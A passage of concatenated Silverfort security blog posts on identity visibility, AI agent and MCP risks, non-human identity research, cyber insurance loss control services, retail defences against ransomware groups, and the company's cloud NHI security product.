readiness and compliance Regulatory frameworks like HIPAA, NIST and SOC2 all require strong access governance. When identity data is consolidated, audit teams can streamline the report creation process, quickly explain why access was granted, and close compliance gaps with more confidence. Incident investigation When a malicious event occurs, the ability to trace an identity’s access history is critical. Visibility into entitlements, authentication patterns, and resource usage gives security and IAM teams the context they need to understand what happened, how far it moved laterally, and how to respond effectively. These outcomes show that identity visibility isn’t a narrow technical capability. It’s a strategic approach that empowers organizations to manage access with greater clarity, reduce risk at scale, and operate with more confidence in complex hybrid or multi-cloud environments. Identity visibility isn’t optional anymore As hybrid environments continue to expand, organizations can no longer keep identity visibility approach as optional. It becomes a strong base for secure access, effective governance, and confident incident response. Without insights into access, even the most mature identity security programs will lack the context needed to operate effectively. The risks of fragmented visibility, including excessive access and undetected privilege escalation are real and increasingly exploited. But with a complete understanding of identity access, both IAM and security teams can take control, reduce risk exposure, and strengthen identity governance. The path forward starts with a simple question: Do you really know who has access to what and why? --- - Published: 2025-05-27 - Modified: 2025-05-27 - URL: https://www.silverfort.com/blog/beyond-the-hype-the-hidden-security-risks-of-ai-agents-and-mcp/ As AI rapidly evolves from a novelty to a necessity, businesses across every industry are feeling the pressure to integrate it into their operations, products, and services. What was once a forward-looking initiative has now become a critical component of staying competitive in a fast-changing market. Shopify’s CEO, Tobias Lütke, recently emphasised this shift by mandating that all employees actively use AI in their daily work—a bold signal that AI adoption is no longer optional.   Gone are the days when AI experimentation was driven solely by enthusiastic technologists or curious stakeholders—it’s now a strategic imperative. A significant component of this transformation is the use of AI agents: intelligent systems designed to autonomously perform tasks, make decisions, and adapt to changes in information.   In this post, we’ll define what AI agents are, introduce MCP (Model Context Protocol), and dive into the security risks that come with these emerging technologies.   AI agents, defined: The brains behind autonomous applications  AI agents are applications where a Large Language Model (LLM) drives decisions, coordinates tasks, and adapts to changing inputs in real time. These aren’t just tools for conversation; they’re engines for action.   A true shift occurs when AI agents are equipped with the tools and services they need to interact with the digital world. Whether it's querying a database, sending a message, updating records, or triggering entire workflows, this tool access transforms AI into an autonomous process.   One of the most promising enablers of this evolution is the Model Context Protocol (MCP). Introduced by Anthropic in November 2024, MCP is an open, emerging standard that simplifies how AI agents connect to tools and data sources. It’s earning widespread attention for doing what the USB standard did for hardware peripherals: replacing complex, one-off integrations with a universal interface.   By standardizing tool access, MCP empowers AI agents to execute dynamic, context-aware tasks across platforms. For example, an AI agent using MCP could independently retrieve live financial data, generate updated internal reports, and initiate transactions based on predefined logic—all without human intervention or custom API development.   How does MCP work?   MCP uses a familiar client-server architecture to standardize how AI agents interact with external tools and data sources. This protocol ensures consistent and reliable communication between the agent and the resources it needs to function effectively.   This setup places MCP clients within the host application, whether that’s an AI assistant, a coding environment, or any other AI-enabled application. It performs the function of managing communication with an MCP server. As part of this process, the application and connected tools must negotiate protocol versions, discover available capabilities, and transmit requests and responses between them.   Source: Norah Sakal https://norahsakal. com/blog/mcp-vs-api-model-context-protocol-explained/  What makes MCP unique is that these capabilities are described in natural language, thereby allowing them to be directly accessed by the LLM driving the AI agent. This enables the model to understand which tools are available and how to use them effectively.   The server uses URI-based patterns to manage access to its resources and supports concurrent connections, enabling multiple clients to interact with it simultaneously. This makes the MCP highly scalable, flexible, and well-suited for complex agentic environments.   Autonomous vs. delegated identity: A crucial distinction As AI systems become more embedded in business and everyday life, defining and managing AI identities is becoming increasingly important. Two key models are emerging: autonomous AI identity and delegated (on-behalf-of, or OBO) identity.   Autonomous AI identity refers to an agent that operates independently, making decisions and taking action without the intervention of a human in real time.   In contrast, a delegated identity represents an AI that performs tasks under the direction of a human. Understanding this distinction is crucial for maintaining proper accountability and security in AI-powered systems.   It is important to note that both models influence how authorization is managed by systems. As an example, an autonomous AI might place an order for office supplies based upon predefined purchasing limits and approval workflows. Meanwhile, an AI that is delegated to a human manager must comply with that manager's permissions, treating the manager as the authority. A failure to differentiate these roles can result in over-permissioned systems, security risks, or misattribution of actions.   Visibility and control: The missing pieces Real-time monitoring is essential for detecting and responding to anomalous behaviors in AI agents, especially as they operate autonomously and make decisions without human oversight. Just as important is robust identity management that clearly distinguishes between non-human identities (NHIs), which represent fully autonomous agents, and delegated identities, in which an agent acts on behalf of a human user.   Tagging each action with the correct identity context allows security teams to enforce least-privilege access, audit agent behavior against user delegations, and maintain clear accountability. Furthermore, tool-specific audit trails provide detailed records of every API call, data access, and action performed by an AI agent. As a result, these logs are essential for forensic investigations and compliance audits and should be integrated with existing SIEM systems to correlate agent activity across environments and detect suspicious activity.   As protocols like MCP expand tool integration capabilities, security frameworks must evolve in parallel, introducing dynamic authorization, continuous monitoring, and adaptive policy enforcement to manage increasingly capable agents. The combination of detailed audit trails and identity-aware monitoring will be critical to maintaining control, visibility, and trust as AI agents become more embedded in core operations.   Prepare now for secure AI adoption As MCP rapidly gains traction as a standardized framework for integrating AI models with external tools and data sources, it’s reshaping how AI systems interact with applications. This unlocks more dynamic and context-aware capabilities. The rapid adoption of this technology, however, has outpaced the development of mature security controls, exposing potential risks such as unauthorized access, data leakage, and compromised tool integrity.   To address these concerns, organizations are encouraged to take proactive steps: Audit current MCP usage or plans: Assess how MCP is currently implemented within your systems or how it’s planned to be integrated. Enhance visibility and standardize authentication: Implement standardized authentication protocols and ensure comprehensive identity tracking to monitor interactions between AI models and external tools. Foster collaboration between engineering and security teams: Encourage cross-functional teams to work together in developing and enforcing security policies tailored to MCP implementations.   By taking these steps, organizations can ensure that the integration of MCP enhances their AI capabilities without compromising security. Securing the future of AI agents  The use of AI agents is unlocking unprecedented efficiency and intelligence across applications - automating tasks, streamlining workflows, and enabling real-time decision making. But with any rapid advancement comes risk. Security practices have not been developed at the same pace as adoption, resulting in serious concerns regarding unauthorized access, data leakage, and misuse of identities.   To stay ahead of emerging threats, prioritize auditing your MCP deployments and implement standardized authentication protocols to establish a secure baseline. Then build a comprehensive AI identity security strategy by leveraging third-party security tools to protect your systems as agents grow more autonomous and deeply integrated into core business operations.   Remember that security isn’t static—it must evolve with your AI stack. --- - Published: 2025-05-22 - Modified: 2025-05-22 - URL: https://www.silverfort.com/blog/insecurity-in-the-shadows-the-data-that-proves-why-non-human-identities-are-a-cybersecurity-priority/ Most security programs are laser-focused on human users, including employees, contractors, and third parties. But there’s a parallel universe growing in scale and risk that remains largely invisible: non-human identities (NHIs). These are the service accounts, machine identities, scripts, applications, secrets, tokens and automation tools that keep our systems running. And they’re multiplying fast. Adversaries don’t just hack people. NHIs are notoriously under-observed, under-protected and over-privileged—and their numbers are growing exponentially. Combine these four factors together, and it’s easy to see why NHIs are prime targets for attackers seeking ways to slip through the cracks and move undetected through environments. Our new research, Insecurity in the shadows: New data on the hidden risks of non-human identities, details the challenges people face finding, securing and protecting NHIs. Deep analysis into billions of authentications across hundreds of organizations with millions of identities showed us that NHIs now outnumber human users by 50 to 1 in large organizations—of which 80% have the kind of critical posture issues that expose to common attack techniques. NHIs are challenging to find and harder to protect, making them heavily targeted by attackers and one of the most unprotected elements of the identity attack surface. Read the full report here Data shows NHIs outnumber human identities by 50:1 and 40% of NHIs have an unknown owner The highlights  NHIs outnumber human identities by 50:1. This means that for every user an organization manages, there are dozens of silent NHIs operating in the background. 40% of cloud NHIs do not have an owner. These accounts are often excluded from proper lifecycle management, leaving them unobserved, unprotected, and open to abuse. Only 5. 7% of organizations said they could accurately inventory all NHIs in their environment. Visibility remains the first—and possibly biggest—barrier to securing NHIs. 56% of organizations unknowingly sync their service accounts to their SaaS directory. This makes it possible for attackers who have accessed an organization’s on-prem environment to also—fairly easily—compromise their SaaS environment too. 46% of service accounts are still using the now-deprecated NTLM protocol to authenticate. Deprecated protocols are insecure protocols, making them easy targets. The key challenges of securing non-human identities  Despite their prevalence, power and usefulness, NHIs can be a thorn in identity and security teams’ sides. Silverfort’s research highlights four key problems that help explain why NHIs are such a major blind spot:  They’re under-observed: NHIs operate behind the scenes, often without visibility or monitoring. In fact, 94. 3% of organizations don’t have full visibility into their service accounts, let alone what they’re doing and what they’re accessing. They’re under-protected: NHIs rarely—if ever—benefit from the same security controls applied to human users. MFA cannot be enforced, and without full observability, behavior baselines cannot be established. Even more worryingly, many of them are stuck using insecure protocols: 46% of service accounts still use NTLM authenticate, despite it being deprecated in mid-2024. They’re over-privileged: Many NHIs are granted far more access than they need, often with domain-level or administrative privileges that persist indefinitely. 35% of all user accounts are service accounts with high access privileges and low visibility, and 56% of organizations unknowingly sync more than half of their service accounts to their SaaS directory. They’re everywhere: NHIs span every environment—on-prem, hybrid, multi-cloud—and touch nearly every critical system. Since 2020, the ratio of NHIs to humans has grown from 10 to 1 to a staggering 50 to 1. Their ubiquity makes them both indispensable and hard to contain. Four reasons why NHIs are a security risk Spotlight on one of the oldest, riskiest and more prolific NHIs: service accounts  Within the large pool of NHI types, service accounts—used for machine-to-machine communication within Microsoft’s Active Directory’s (AD) environments—have been overlooked by defenders but targeted by attackers. Traditional identity security controls are almost entirely human-centric, so service accounts simply couldn’t be protected in the traditional way. Our data shows that 46% of service accounts regularly authenticate with NTLM, a deprecated authentication protocol with plenty of vulnerabilities. This year alone, several researchers unveiled vulnerabilities about NTLM. Hackers know this and use it to their advantage. You can read more about the countless attacks where NTLM is used here. Statistic showing how often service accounts authenticate with NTLM We also found that 37% of service accounts are what we call “interactive”. These are service accounts that appear to be “interacted” with by employees—or attackers—to bypass privileged access controls. Service accounts can be interacted with to bypass privileged access controls It began with human admins creating service accounts across multiple systems, apps, platforms and services without a centralized view of what they are responsible for, who created and owns them, and what they need access to. For most organizations, there has never been a single source of truth for NHIs, nor any standardized onboarding, offboarding, or ownership processes, leaving their inventories incomplete at best. Most organizations have either medium or low visibility into service accounts Securing your NHIs is a must, not a nice-to-have  Threat actors have already realized what many organizations have not: non-human identities are often the weakest link in an enterprise’s identity fabric.   1. API key or token theft  Internet Archive Breach (October 2024): Attackers exploited unrotated API keys leaked from the Internet Archive's GitLab repository, gaining access to over 800,000 support tickets containing sensitive user information.   2. Overprivileged service accounts  Dropbox Sign Breach (May 2024): Attackers compromised a backend service account with excessive privileges, accessing the customer database and exposing sensitive user data, including email addresses, usernames, hashed passwords, API keys, and OAuth tokens.   3. OAuth application abuse  Microsoft and Okta Attacks: Nation-state actors have been seen to abuse OAuth applications to move laterally across cloud environments. Major software companies like Microsoft and Okta have fallen victim to attacks leveraging compromised machine identities, highlighting the vital need to connect non-human identities with their human counterparts for complete visibility and protection.   These aren’t isolated incidents—they reflect a systemic trend. NHIs are now integral to one of the most exploited attack vectors: identity. Unlike human identities, NHIs cannot be protected by the most common safeguards, such as MFA, creating a vast, invisible, and vulnerable attack surface that many defenders are ill-equipped to secure.   It’s easy to see the trend at play here. While organizations have invested heavily in securing human users, NHIs still fly under the radar. But all is not lost—there is something they can do about it.   A new approach: Silverfort’s expanded NHI Security Recognizing the growing risk and operational complexity around NHIs, we have expanded our Non-Human Identity Security capabilities to provide continuous protection and visibility to all NHIs—including NHIs on-prem and the cloud. This includes:  Unified coverage for both on-prem and cloud NHIs. Complete discovery and ownership mapping. Real-time, scalable protection of service accounts with virtual fencing. Seamless integration across platforms. Learn more about out expanded NHI security offering, and how it can help you find and map your unknown NHIs, enforce security controls and remediate misconfigurations and identity weaknesses with actionable recommendations. Final thoughts Non-human identities are no longer a niche IT concern—they are a central pillar of enterprise infrastructure and a rapidly expanding attack surface all their own. The evidence is clear: NHIs are everywhere, they have elevated access, and they’re largely invisible to traditional security controls. As attackers increasingly exploit this blind spot, organizations must act quickly to secure their non-human identity landscape.   The path forward starts with visibility, is strengthened through policy enforcement, and culminates in continuous, adaptive protection, so every dimension of identity is known and secured.   Read the full report here --- - Published: 2025-05-12 - Modified: 2025-05-12 - URL: https://www.silverfort.com/blog/loss-control-services-one-of-the-most-underused-tools-for-reducing-identity-security-risk/ Cyber insurers are offering tools that could significantly reduce your identity risk—but most organizations aren’t using them. One of the most significant advancements in the sector is the increased emphasis on loss control services. These services are designed to mitigate risk, enhance cybersecurity postures, and ultimately reduce the frequency and severity of cyber-related claims. Many of them are free of charge or discounted as carriers and brokers have negotiated prices with many different vendors. In this blog, we’ll explore what loss control services are, why they matter for reducing identity security risk, and how you can use them to strengthen both your cyber insurance coverage and security posture.   What are loss control services?   Loss control services in the cyber insurance space refer to proactive risk management strategies insurers provide to policyholders—often at no cost or a reduced rate. These services are typically offered annually upon policy renewal and give organizations access to expert guidance and tools that support stronger cyber hygiene and risk posture. Loss control services include:  Security assessments: Identifying security risk exposures in an organization's cybersecurity framework. These assessments typically evaluate network architecture, endpoint protections, patching practices, and policy enforcement to find security blind spots. Identity risk assessments: Evaluating identity-related exposures that increase the likelihood of a cyber incident. These assessments help uncover gaps in security controls enforcement, including multifactor authentication (MFA), security of non-human identities (NHIs)s, including on-prem service accounts, and privileged access—key factors in mitigating credential-based attacks and lateral movement. Employee training: Educating staff on best practices to prevent cyber breaches. Training programs often focus on raising employee’s awareness on phishing attacks, password hygiene, secure data handling, and incident reporting protocols. Incident response planning: Helping organizations develop effective strategies on risk mitigation, incident response and remediation. These services guide security teams through playbook creation, communication planning, and response action items to ensure faster recovery during real incidents. Endpoint protection solutions: Implementing modern cybersecurity tools to protect networks and devices. This step covers deploying EDR/XDR platforms, hardening configurations, and improving visibility into endpoint behaviors across hybrid environment. Compliance assistance: Supporting organizations in alignment with industry regulations and standards like GDPR, HIPAA, and NIST. It includes security policies gap analysis, audit preparation, and mapping security controls to regulatory frameworks. Beyond improving baseline security, loss control services help organizations mitigate specific risk factors that drive cyber insurance decisions. These include identity-related exposure, incident response readiness, and the maturity level of security controls within the environment.   Why are loss control services important for insureds?   While the cyber insurance market has softened, the risk of ransomware and identity-based attacks remains high. Organizations of all sizes, from SMBs to the Fortune 500, can be affected and it can cost them a lot. The increasing frequency and severity of cyberattacks has led insurers to re-evaluate their risk mitigation strategies. Loss control services are now a critical component of cyber insurance policies because they help reduce the frequency of claims by proactively addressing security exposures, and lower claim severity by enabling faster, more effective incident response.   They also enhance risk selection by giving underwriters greater visibility into a policyholder’s cybersecurity posture, which can lead to more favorable terms, fewer restrictions, and improved pricing. Finally, loss control services strengthen relationships between insurers and insureds by providing ongoing value and support in an increasingly competitive market.   Don’t leave your cyber insurance potential untapped. Leverage loss control services.   If you are not taking full advantage of the loss control services your broker and carrier offer, you are leaving real value and protection on the table. In today’s cyber insurance market, loss control is not just helpful; it is essential. These services are designed to proactively strengthen your identity security posture, reduce the likelihood of costly claims, and help you negotiate better coverage terms.   Cyber threats are evolving fast, and insurers are rewarding businesses that invest in risk management. The more you use the tools and expertise available to you, the more resilient and insurable your business becomes. Before you renew or purchase your next policy, make it a priority to explore what loss control services are included. The right support could mean the difference between surviving a cyberattack or suffering major losses.   Protect your business, maximize your coverage, and get the full value you are paying for. Start by asking: What loss control services are available to me?   Begin with the Identity Risk Assessment—a strategic step towards strengthening insurability. Learn more about the Identity Risk Assessment. --- - Published: 2025-05-07 - Modified: 2025-06-23 - URL: https://www.silverfort.com/blog/defending-retail-against-identity-threats-what-you-can-do-today/ In recent weeks, several major UK retail brands, including M&S, Harrods, and the Co-operative Group, have recently suffered significant cyberattacks disrupting business operations. These incidents are claimed to have been orchestrated by the DragonForce ransomware group.   As a former Head of IAM at a major retailer, I’ve been part of the response to identity-first attackers, and I have deep empathy for the teams who are working tirelessly to respond and recover.  While the full scope of these breaches is still coming to light, early signs point to an identity-first threat actor. DragonForce are known to exploit identity weaknesses and then move laterally through compromised credentials. Their methodology highlights something we've been saying for years: identity is the new battleground. These attackers target who you are rather than what you have.   While you can’t fix everything in a day, I’ve outlined a few steps that, based on my experience, identity and security teams can take now to get closer to where they want to be.   Understanding the attacker: An identity-first approach  So, who are these attackers, and how do they operate? DragonForce uses similar TTPs as Scattered Spider and are known to use phishing emails, exploit known vulnerabilities, and leverage stolen credentials to gain initial access to victim networks. Their playbook starts with the most vulnerable link in any security chain: humans. They're masters of social engineering, crafting convincing phishing campaigns, executing SIM swaps to hijack phone numbers, and launching "MFA fatigue" attacks where they bombard users with authentication requests until someone simply gives in and approves one. They're particularly fond of targeting helpdesk staff, manipulating them into resetting passwords and providing that crucial first foothold.   Once inside, they move methodically. They look for accounts protected by just a username and password, using these to move through networks. Service accounts—non-human identities that keep systems running but often fly under the radar—are often targeted, offering privileged access with minimal monitoring. From there, it's a matter of increasing their privileges and positioning themselves to deploy ransomware where it hurts most. What makes this approach so devastating in retail isn't just the sophistication; it's that it exploits blind spots that are particularly common in retail environments.   Retail's complex identity landscape  If you work in retail security, you're already facing unique challenges that make identity protection especially difficult. You manage tens, hundreds or thousands of locations—plus online businesses—that all need consistent security controls despite varying local conditions and operational constraints.   Your infrastructure is a complex hybrid of on-prem systems alongside newer cloud environments, all of which need protecting. Your critical systems may have been in place for many years, designed before modern identity security was even a consideration.   Your operations likely rely on countless third-party vendors and service providers, each requiring specific access to your systems. Meanwhile, you’re enabling frontline workers with corporate accounts for greater business efficiency and security, but in doing so, you’re accidentally increasing your identity attack surface multiple times over. All the while, you’re tackling workforce that grows rapidly with seasonal demands, making identity governance a constantly moving target.   These realities mean a large attack surface for identity-based threat actors to exploit. Admin accounts often lack proper oversight and protection. Non-human identities, from Active Directory service accounts to cloud workloads, frequently operate with extensive access and minimal monitoring. MFA implementation is typically inconsistent, especially for backend systems. And the interconnected nature of retail environments creates countless pathways for attackers to move between systems once they've gained initial access.   Building retail-specific identity defenses  The recent retail breaches can act as a catalyst for identity and security teams to revisit and accelerate key initiatives—especially those that may have already faced pushback from teams focused on operational efficiency. Moments like these can help align priorities across the organization. If I were in their shoes, here’s what I’d focus on right now:  1. Protect initial access points  Enforce comprehensive MFA: Verify that all external access points to systems are secured with MFA, including VPNs, SaaS applications, and other internet-facing systems.   Implement phishing-resistant MFA: Move to number matching at minimum (remember to remove non-phishing-resistant factors too) and consider “unphishable” FIDO2 authenticators (like Yubikeys) for prime targets, like IT and security teams. Secure password reset processes: Harden helpdesk procedures with strict identity verification protocols. Consider temporarily implementing in-person resets for your most critical accounts.   Protect MFA management: Ensure second factors can only be added or changed with appropriate identity verification, not just with username and password.   2. Prevent lateral movement post-compromise  Extend MFA coverage internally: MFA must extend beyond the perimeter to internal systems and infrastructure access, especially Active Directory environments that are prime targets for threat actors and ransomware groups. Protecting RDP alone is not enough—this must be on all protocols (PowerShell, for example, is favoured by attackers).   Protect non-human identities (NHIs): Implement strict controls on service accounts, limiting where they can be used and alerting on any unusual activity patterns that could indicate compromise. Contain vulnerable legacy protocols: Restrict legacy authentication protocols like NTLMv1 to the applications that absolutely require them.   Implement identity segmentation: Create security boundaries between different parts of the retail environment to contain breaches; for example, by disallowing server authentication from your retail sites.   3. Monitor for identity threats  Deploy Identity Threat Detection & Response: Implement ITDR to identify anomalous behaviors like lateral movement attempts and equip your SOC to respond.   Focus on service account activity: Create detailed baselines of normal service account behavior and alert on deviations.   Monitor privileged account usage: Track admin account activity with particular attention to cross-tier usage where high-privilege accounts access lower-security environments.   Real world protection in action  This isn't just theoretical advice; it's based on real battles against the exact threats targeting retailers today.   Take the case of a Silverfort customer who faced a lateral movement attack similar to what M&S is experiencing now. Attackers had already compromised two administrator accounts and a service account, typically a recipe for disaster. But because they had implemented MFA across all internal systems and automated service account protection, they detected and blocked the attack in its early stages, preventing what could have been catastrophic damage to their operations. You can read the full case study here.   Or consider another organisation, a leading manufacturer, that prevented lateral movement during a sophisticated supply chain attack. Nation state actors had compromised a factory network and were attempting to pivot into the company's domain environment through employees' laptops. By implementing policies that detected and blocked unusual authentication attempts, particularly those using vulnerable protocols like NTLM, their security team stopped the attack before it could establish a foothold. This detailed case study is available here.   Secure today, build for tomorrow  While these immediate actions will help contain identity risks quickly, there are other protections to consider that are longer-term investments. Identity Security Posture Management (ISPM) can proactively discover and address identity weaknesses before attackers find them. Create a true "closed loop" of identity security where account setup and recovery processes require strong verification at every step.   Look at automating your identity lifecycle with special attention to the often overlooked non-employee and non-human identities. Reduce reliance on local accounts that bypass central identity controls, and begin the journey toward zero standing privileges, where access is provided just in time and just enough, dramatically reducing the attack surface that DragonForce, Scattered Spider and similar groups exploit.   For your non-human identities, consider moving toward ephemeral credentials rather than static, high-risk credentials like long-lived service account passwords, secrets, API keys, and SSH keys. This eliminates one of the most pervasive risks in retail environments—compromised service account credentials that provide attackers with persistent access.   Mind the identity gap  Traditional approaches to securing identities simply aren't sufficient against today's identity-focused attackers where every account and authentication presents a risk. For retailers, where system availability directly impacts the bottom line and customer trust is paramount, getting identity security right—containing the risk of account compromise, lateral movement and ultimately ransomware—is paramount.   By understanding how groups like DragonForce operate and implementing comprehensive identity security measures, you can significantly reduce your risk profile. As we've seen from real world examples, properly implementing identity security can be the difference between business as usual and a headline-hitting breach. Download our ebook, Identity Security in Retail: How to Prevent Ransomware and Thwart Lateral Identity Attacks. --- - Published: 2025-05-06 - Modified: 2025-05-08 - URL: https://www.silverfort.com/blog/uncovering-the-hidden-threat-securing-cloud-non-human-identities-with-silverfort/ As innovation in identity security evolves by the day, so does the attack surface. Nothing is growing faster than cloud-based non-human identities (NHIs).   These machine identities are growing at a staggering rate. They run critical workloads, automated processes, and cloud-native applications, and in most organizations, they now outnumber human identities 50 to 1. While they are critical to keeping operations running, they are also one of the biggest security blind spots in an organization's cloud identity security stack.   Most organizations have limited visibility into how many NHIs exist in their cloud environment, what they can access, where they reside, and who manages them. These machine identities are regularly created on the fly, left untracked, and operate with long-lived credentials and overprivileged access, making them prime targets for compromise. There is no standard onboarding process, offboarding rarely occurs, and ownership is unclear at best, leaving accountability completely absent from the process. As a consequence, orphaned and unmanaged NHIs silently accumulate, expanding the attack surface and providing low-hanging fruit for attackers.   In this post, we will unpack the different blind spots and risks associated with cloud NHIs before exploring the key ways you can resolve them with our newly expanded cloud NHI security capabilities. Cloud NHI blind spots: What you can’t see will hurt you  When organizations fail to properly manage and monitor cloud NHIs, they create critical security blind spots that are easy to overlook but challenging to defend. These identities often slip through the cracks because they aren’t tied to a human owner, despite retaining persistent access to critical systems, services, and data.   Without clear visibility into the details of each NHI and their activities, why they're created, and what level of access they hold, organizations lose control over a rapidly growing and less visible layer of their cloud environment. Over time, unmanaged NHIs accumulate unchecked, expanding the attack surface and introducing hidden pathways for attackers to exploit. These blind spots aren’t just oversights; they are structural weaknesses in your cloud security posture.   What is the most critical security blind spots organizations face with cloud NHIs?   Discovery gaps Limited visibility and inability to detect the full range of NHIs operating across cloud environments.   Regularly abused Poor misconfigurations and long-lived credentials allow access far beyond their intended use, creating unnecessary exposure.   Overprivileged access NHIs are often granted excessive permissions by default, making them highly privileged and risky if compromised.   Complex lifecycle With no clear ownership or governance, credentials are often not rotated or break applications when changed, while offboarding is not managed properly. Silverfort's NHI Security: Full coverage of cloud NHIs  For years, Silverfort has been the industry leader in securing on-prem Active Directory (AD) service accounts, providing deep visibility and control for some of the world’s most security-conscious enterprises. Now, we are bringing that same level of depth and precision to the cloud.   Silverfort enables you to automatically discover and classify all types of NHIs across cloud identity providers, infrastructures, and SaaS applications, so all identities and access paths are identified and continuously monitored.   With Silverfort's NHI Security, organizations gain full visibility into the effective privileges of every cloud NHI, uncovering excessive or unnecessary access that could pose a security risk. By continuously analyzing privilege levels across cloud environments, organizations can now easily identify and prioritize critical exposures and reduce their overall attack surface.    In addition, Silverfort helps close lifecycle and ownership gaps by mapping each NHI to a responsible owner and delivering actionable recommendations for remediation. This enables security teams to reduce risk, enforce accountability, and strengthen their overall security posture.   Silverfort uses a three-step approach to securing cloud NHIs: Discover and classify the different types of NHIs  Prioritize the most critical exposures  Remediate lifecycle and security gaps  Discover and classify  The first step in properly managing and protecting all non-human identities is knowing exactly where they reside. Here are several key questions to ask:  What NHIs do you have?   What do they access?   Where do they reside and who manages them?   Once you integrate your cloud identity providers, infrastructure, or SaaS applications with Silverfort, the platform automatically identifies all cloud NHIs in your environment. This provides complete visibility into your NHI inventory. Silverfort’s ability to map NHIs by source, destination, privilege level, and security posture enables the platform to automatically identify and accurately categorize them across your cloud environment.   The variety of NHI types is classified by Silverfort into seven categories:  Access keys: Long-lived credentials allowing programmatic access for users or NHIs to access services and resources.   Service accounts: A dedicated identity used by applications, services, or workloads to interact with other services and systems securely, operating in a single environment or set of resources.   IAM roles: An AWS identity assigned to a workload or user, allowing specific actions on defined resources in a system. IAM roles are not tied to specific entities and can be assumed dynamically by authorized entities, providing temporary permissions, often via identity federation or delegation.   Tokens: Temporary credentials dynamically generated, typically as part of the authentication process. Tokens are often scoped for a specific set of permissions and are less prone to long-term security risks.   Applications: Identities representing software systems, functioning as clients or servers in a distributed architecture. Applications are registered in IAM platforms to define how they authenticate, authorize users, integrate with other applications and services, and what actions they can perform.   Certificates: Digital documents used to establish identity, encrypt communication, and enable secure authentication. Certificates include a public key, a private key (secret), and metadata such as expiration and issuer.   Secrets: Sensitive data, such as passwords, API keys, or private configuration details, used to access services or authenticate users and applications. Secrets are often static string values requiring secure storage and management to prevent unauthorized access. By discovering and classifying every type of NHI, you seamlessly gain end-to-end visibility into your entire NHI inventory—including each identity’s name, privilege level, security posture, and the sources and destinations it interacts with. This comprehensive visibility empowers you to prioritize high-risk identities, reduce exposure, and take targeted, confident action to strengthen your cloud security posture.   Prioritize With detailed insights into every cloud NHI in your environment—including privilege levels, usage patterns, ownership, and overall security posture—you can get a clear understanding of where security gaps and exposures exist, making it easy to shift from reactive guesswork to informed, proactive decisions. With these insights at your fingertips, you can focus on the highest-risk NHIs, cutting through the noise and zeroing in on what truly matters.   Silverfort makes it easy to prioritize NHIs based on risk level, considering factors like privilege scope, behavioral patterns, and exposure. You can also filter identities by ownership, to quickly identify which teams or users are responsible for mismanaged accounts, empowering targeted remediation and driving accountability across the organization.   With complete visibility into your cloud NHI landscape, Silverfort automatically analyzes privilege levels, access patterns, and behavioral signals to surface the most critical exposures, so you can take action. By identifying overprivileged, misconfigured, or orphaned NHIs, Silverfort enables you to prioritize what matters most, eliminate unnecessary access, and quickly close high-risk security gaps.   Through our real-time risk analysis, organizations can:  Identify posture gaps by uncovering exposures in identity systems and processes, helping you detect weaknesses before they are exploited.    Assess risk and prioritize remediation by focusing on the NHIs and security gaps that pose the greatest threat to your environment.    Reduce your attack surface by remediating misconfigurations and excessive privileges, cutting down the number of exploitable entry points for attackers.     Within the NHI detail view, Silverfort delivers rich context and intuitive visualizations that reveal how and where each identity is configured. You can access key metadata directly from the connected cloud platform, including last activity, assigned roles, creator, and more. This enables you to gain a clear view into an NHI’s effective privileges and actual usage, helping you assess associated security risks. With this visibility, you can quickly identify exposures, understand their impact, and take focused, informed steps to investigate and remediate them with confidence.   Remediation  Now that you know where to prioritize and mitigate risk, having effective remediation is what truly closes the exposures and risks loop. Silverfort provides dynamic and customized step-by-step guidance tailored to each specific exposure, so teams can resolve issues quickly and with confidence.   Silverfort surfaces context-aware remediation paths based on the nature and severity of each risk. Depending on the exposure, recommendations may include code snippets, smart suggestions, or multiple resolution alternatives that fit seamlessly into your existing workflows. Whether you are reducing excessive privileges or assigning ownership to orphaned accounts, every step is clear, relevant, and actionable.   By turning visibility into action, Silverfort helps you remediate both security and lifecycle gaps—strengthening your cloud NHI environment and reducing your exposure with confidence.   Learn more about Silverfort’s Cloud NHI Security  With Silverfort’s expanded cloud NHI protection capabilities, organizations gain full visibility and control over one of the fastest-growing identity risks in the cloud. By automating the discovery, classification, and analysis of NHIs across IdPs, infrastructure, and SaaS platforms, Silverfort surfaces critical exposures and effective privileges, so you can act with precision.   Through prioritized risk insights, targeted remediation, and clear ownership mapping, Silverfort helps close visibility gaps, reduce the cloud attack surface, and apply consistent security controls, with the same trusted depth we have delivered for on-prem environments.   Learn more about Silverfort’s NHI security product here. --- - Published: 2025-04-28 - Modified: 2025-04-28 - URL: https://www.silverfort.com/blog/introducing-non-human-identity-security-nhi/ Today, Silverfort expands its deep identity protection to the cloud—bringing unmatched visibility and control to non-human identities (NHIs) across cloud providers, infrastructure, and SaaS apps, just as we’ve long done for on-prem service accounts.   There is an explosion happening in the identity landscape, and most organizations are blind to: the growth and sprawl of non-human identities (NHIs)—service accounts, API keys, tokens, certificates, and more. What began as a small set of service accounts and machine identities has now expanded into a complex, interwoven ecosystem. These identities are essential for automating processes, securing systems, and enabling modern digital workflows, but they’re also the source of significant security exposures.   The human-to-NHI ratio, already estimated around 1:50, continues to grow. This massive scale creates an ever-expanding attack surface for every organization where these machine accounts can be compromised and provide malicious actors entry points into an organization's environment to move laterally. As organizations increasingly embrace multi-cloud environments, SaaS, and AI-driven automation, NHIs are no longer just the technical components—they've become the connective tissue of modern organizations. They orchestrate and secure critical workflows across AI agents, SaaS platforms, homegrown applications, and cloud infrastructure. This dynamic web of machine-led interactions is what drives innovation and creates tangible business value. Non-human identities frequently access core data—intellectual property, customer information, financial systems—and operate at the core of business-critical infrastructure. They don’t just support growth; they drive it.   The Problem: The Explosion of NHIs and the Security Crisis It Creates  The challenges of securing NHIs are immense. They span cloud and on-prem environments, managed by multiple teams: IT, DevOps, Engineering, and Security. These teams don't always speak the same language when it comes to identity security, and more importantly, they lack the visibility to track and manage these identities across the ecosystem. NHIs are created by one team but modified and used by others, making ownership tracking nearly impossible.   These identities don’t operate in silos—they are interconnected across platforms and applications with complex workflows. This is increasingly more challenging in cloud-forward environments with cloud NHIs. For example, a GitHub identity may trigger access to AWS, Azure, and other cloud environments, amplifying both the complexity and risk of the NHI ecosystem. The lack of visibility into these diverse and dynamic identities makes it nearly impossible to understand the full scope of risk. NHI risk begins from the point of creation and configuration. They span a variety of naming conventions, credential types, lifecycle states, and control planes—often with no standardized governance. Some are mistakenly configured with human credentials, while others are created directly in code or left unmanaged by DevOps pipelines, proof of concepts, and more.   From a lifecycle standpoint, NHIs have been treated as “set and forget” assets. Many were provisioned once and never touched again, despite being reused, repurposed, or misconfigured over time. This 